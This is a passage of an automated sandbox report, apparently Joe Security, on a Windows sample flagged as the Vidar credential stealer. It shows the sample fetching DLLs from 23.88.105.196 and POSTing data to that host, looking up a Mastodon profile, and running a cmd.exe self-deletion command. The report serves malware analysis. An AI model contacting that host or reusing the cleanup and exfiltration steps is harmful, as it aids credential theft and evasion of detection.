00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                                                                                            Sep 27, 2021 18:33:10.104836941 CEST3264OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:10.126363993 CEST3265INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:10 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 144848
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "235d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:10 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
                                                                                                                                            Sep 27, 2021 18:33:10.232507944 CEST3416OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:10.254276991 CEST3417INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:10 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 83784
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "14748-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:10 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
                                                                                                                                            Sep 27, 2021 18:33:17.113476992 CEST3503OUTPOST / HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                            Content-Length: 86263
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Sep 27, 2021 18:33:17.362571955 CEST3589INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:17 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 16Gy0


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.64974088.99.75.82443C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2021-09-27 16:33:07 UTC0OUTGET /@killern0 HTTP/1.1
                                                                                                                                            Host: mas.to
                                                                                                                                            2021-09-27 16:33:08 UTC0INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Server: Mastodon
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Permissions-Policy: interest-cohort=()
                                                                                                                                            Link: <https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to>; rel="lrdd"; type="application/jrd+json", <https://mas.to/users/killern0>; rel="alternate"; type="application/activity+json"
                                                                                                                                            Vary: Accept, Accept-Encoding, Origin
                                                                                                                                            Cache-Control: max-age=0, public
                                                                                                                                            ETag: W/"e73efba249baae2326e4e19544f6451b"
                                                                                                                                            Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://mas.to; img-src 'self' https: data: blob: https://mas.to; style-src 'self' https://mas.to 'nonce-qA4p2YJsld36ae3JZC7g3w=='; media-src 'self' https: data: https://mas.to; frame-src 'self' https:; manifest-src 'self' https://mas.to; connect-src 'self' data: blob: https://mas.to https://media.mas.to wss://mas.to; script-src 'self' https://mas.to; child-src 'self' blob: https://mas.to; worker-src 'self' blob: https://mas.to
                                                                                                                                            Set-Cookie: _mastodon_session=RIakeF43yB5z3DKgswfIwsUWuipKimb3U36IDPe3BnfqFVo5V%2B9JbHD7sCjas8o4uv%2FUZ01SoZeGnpGrhNIT7YlNqQgmsvtKXeBeS67xlevWKgMAL3hhCi1rys%2FAyZ1bhx8uw5Np%2FqqDrCJk%2FqHfHxLvfoZY7fWdird%2B8Lp8GVfMTwAuifqcVTrDGOCQ9sKHR0tDxAv6QjZ7OZKU%2Bi8wTI2X%2FrtE%2FPvG1Ebwkc1dcZdGw0senq2NpBe4WQ4CbHTZeld8UjjiuG%2FyFzDPmvz0tbmrP2dRr8r29PLXoYOlK5ptiGIQB%2BI6ry0UPC4xYqlnhFXeGqNpMEOAkRYGdZ9jIxheqzRy7i3tzYiYGHcDYqqItjR6SA%3D%3D--Zv8ToGmxUq3yG4sm--A%2Fz4zfpZIAawpeM%2BJ4VnYA%3D%3D; path=/; secure; HttpOnly; SameSite=Lax
                                                                                                                                            X-Request-Id: 5ca77ef3-9a25-46ab-b7a5-6919b1fd0707
                                                                                                                                            X-Runtime: 0.052058
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                            X-Cached: MISS
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            2021-09-27 16:33:08 UTC1INData Raw: 35 30 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                                                                                            Data Ascii: 503a<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                                                                                            2021-09-27 16:33:08 UTC16INData Raw: 32 35 20 30 2d 31 37 2e 34 31 37 39 37 20 37 2e 35 30 38 35 31 36 2d 31 37 2e 34 31 37 39 37 20 32 32 2e 33 35 33 35 31 36 76 33 32 2e 33 37 35 30 30 32 48 39 36 2e 32 30 37 30 33 31 56 38 35 2e 34 32 33 38 32 38 63 30 2d 31 34 2e 38 34 35 2d 35 2e 38 31 35 34 36 38 2d 32 32 2e 33 35 33 35 31 35 2d 31 37 2e 34 31 37 39 36 39 2d 32 32 2e 33 35 33 35 31 36 2d 31 30 2e 34 39 33 37 35 20 30 2d 31 35 2e 37 34 30 32 33 34 20 36 2e 33 33 30 30 37 39 2d 31 35 2e 37 34 30 32 33 34 20 31 38 2e 37 39 38 38 32 39 76 35 39 2e 31 34 38 34 33 39 48 33 38 2e 39 30 34 32 39 37 56 38 30 2e 30 37 36 31 37 32 63 30 2d 31 32 2e 34 35 35 20 33 2e 31 37 31 30 31 36 2d 32 32 2e 33 35 31 33 32 38 20 39 2e 35 34 31 30 31 35 2d 32 39 2e 36 37 33 38 32 38 20 36 2e 35 36 38 37 35 31
                                                                                                                                            Data Ascii: 25 0-17.41797 7.508516-17.41797 22.353516v32.375002H96.207031V85.423828c0-14.845-5.815468-22.353515-17.417969-22.353516-10.49375 0-15.740234 6.330079-15.740234 18.798829v59.148439H38.904297V80.076172c0-12.455 3.171016-22.351328 9.541015-29.673828 6.568751


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            Analysis Process: T6zZFfRLqs.exe PID: 6576 Parent PID: 5356

                                                                                                                                            General

                                                                                                                                            Start time:18:32:58
                                                                                                                                            Start date:27/09/2021
                                                                                                                                            Path:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Users\user\Desktop\T6zZFfRLqs.exe'
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:599552 bytes
                                                                                                                                            MD5 hash:5D5E83E151A99BED97E13839E8881CB5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low

                                                                                                                                            Analysis Process: cmd.exe PID: 6820 Parent PID: 6576

                                                                                                                                            General

                                                                                                                                            Start time:18:33:19
                                                                                                                                            Start date:27/09/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                                                                                                                                            Imagebase:0x2a0000
                                                                                                                                            File size:232960 bytes
                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: conhost.exe PID: 6828 Parent PID: 6820

                                                                                                                                            General

                                                                                                                                            Start time:18:33:19
                                                                                                                                            Start date:27/09/2021
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff61de10000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: taskkill.exe PID: 6860 Parent PID: 6820

                                                                                                                                            General

                                                                                                                                            Start time:18:33:19
                                                                                                                                            Start date:27/09/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:taskkill /im T6zZFfRLqs.exe /f
                                                                                                                                            Imagebase:0xaa0000
                                                                                                                                            File size:74752 bytes
                                                                                                                                            MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: timeout.exe PID: 6916 Parent PID: 6820

                                                                                                                                            General

                                                                                                                                            Start time:18:33:20
                                                                                                                                            Start date:27/09/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:timeout /t 6
                                                                                                                                            Imagebase:0x1000000
                                                                                                                                            File size:26112 bytes
                                                                                                                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >